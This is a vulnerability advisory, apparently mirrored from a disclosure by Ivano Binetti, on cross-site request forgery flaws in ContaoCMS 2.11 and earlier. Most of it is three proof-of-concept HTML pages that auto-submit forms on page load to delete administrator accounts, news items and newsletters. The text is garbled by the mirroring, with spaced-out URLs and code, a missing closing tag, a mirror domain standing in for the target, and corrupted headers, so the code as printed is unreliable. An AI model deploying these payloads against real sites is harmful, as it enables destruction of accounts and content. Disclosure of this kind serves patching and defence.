ContaoCMS (aka TYPOlight) & lt; = 2.11 CSRF (delete administrator/delete article)

Title: ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin-Delete Article)
By Ivano Binetti (http://ivanobinetti.com)
: Http://www.contao.org/en/download.html
Develop this Website: http://www.contao.org
Affected Versions: 2.11.0 (latest) and earlier
Test Platform: Debian Squeeze (6.0)
+ Region-+
+ ---------------------------------------- [Multiple defects by Ivano Binetti] --------------------------------------------- +
Summary
1) program Introduction
2) defect description
2.1 Delete an administrator or user
2.2 Delete news
2.3 Delete letterhead
+ Region-+
1) program Introduction
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that
Is easy to maintain ".
2) defect description
Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages
(Articles, news, newsletter and so on ).
2.1 Delete an administrator or user
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to delete ADMIN/USER account </H2>
<Form method = "POST" name = "form0" action = "http: // www.2cto.com/contao/main. php? Do = user & act = delete & id = 2 ">
</Body>
</Html>
Note that the is possible to delete any admin/user, also the first administrator (id = 1) created during Contao's installation phase.
2.2 Delete news
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to delete news </H2>
<Form method = "POST" name = "form0" action = "http: // www.2cto.com/contao/main. php? Do = news & act = delete & id = 1 ">
</Form>
</Body>
</Html>
2.3 Delete A news letterhead
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to delete news letterhead </H2>
<Form method = "POST" name = "form0" action = "http: // www.2cto.com/contao/main. php? Do = newsletter & act = delete & id = 1 ">
</Form>
</Body>
</Html>